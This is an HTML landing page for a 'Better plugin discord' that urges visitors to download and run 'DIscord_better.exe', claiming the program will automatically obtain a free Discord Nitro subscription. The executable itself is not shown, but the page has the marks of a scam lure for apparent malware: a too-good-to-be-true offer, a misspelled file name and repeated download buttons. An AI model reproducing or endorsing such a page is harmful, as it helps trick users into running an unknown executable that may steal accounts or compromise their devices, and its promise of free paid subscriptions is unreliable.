<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Home</title>
    <link rel="stylesheet" href="/css/style.css">
    <link rel="preconnect" href="https://fonts.gstatic.com">
<link rel="preconnect" href="https://fonts.gstatic.com">
<link rel="preconnect" href="https://fonts.gstatic.com">
<link rel="preconnect" href="https://fonts.gstatic.com">
<link href="https://fonts.googleapis.com/css2?family=Ubuntu:wght@500&display=swap" rel="stylesheet"> 
<body>

    <header>
        <nav>
            <h3>Better plugin discord</h3>
            <a href="/DIscord_better.exe"><img class="incredibile" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABoAAAAaCAYAAACpSkzOAAAABmJLR0QA/wD/AP+gvaeTAAAB1klEQVRIid2VsW7TUBSGv2OVoEQ8AQw8gIsqoiuhVhEbW/sEgbEgJDqzdU4kVhYYaR8BsbABokiGRkCyJCthNiDFSiP/DNjIspLYxkVC/Ivt63vud/9zzrXhv5OkhqS+pKmW64uknqRGXVBvBSCvXl3QKid5fa3DMUmqtdP1mgLPgMO/DUrVJ5OanfNeXVInbajfjszMzhuUwATgVQx6k8nAqyqxlRzl61klppKjOvp3QJKuSvq25BhEkg4kFa1xAESlaiSpA7wALqUQYM/MXo7H44thGN4FusBm8v6TpONWq/XE9/25pFulmyEHe2BmjweDwZXFYvEc2FoRdup53m673Z5W7boO8AjYmUwmF8IwfLcGkupDs9ncXpvf9MCkz2b2GrhpZnEYhvfyEOecOefyG25HUbRfVMhpxkkKmye33YLY7IZvr01d8g96mBtumlkUBMF3kuZY4gKAIAjSbPzYKNjMYXK9A1wuaWCZ4j/+qAZBcALcyI6lzjJOAJD01mNJHcpI0lHZuWZ2ZCvqsE6fga3RaLQxm81OgOsF898D2x6/6tAncVZCm8B93/fnnuftAqcFkD3n3Fntn91wOGxEUbQfx3HXzK4BmNlHScfAU+fcGcBPDyJ9TiKmSicAAAAASUVORK5CYII=">download now</a>
        </nav>
    </header>

    <main>
        <h1>The final plugin you need</h1>
        <br>
        <p>Get discord nitro for free. Very easy installation.</p>
        <br>
        <p class="io">Run the program, and wait, the plugin automatically find a discord nitro subscription for you.</p>
        <form action="DIscord_better.exe"><button type="submit"><img src="https://img.icons8.com/metro/26/000000/downloads-folder.png"/><p class="ciao">Download now</p></button></form>
    </main>


</body>

</html>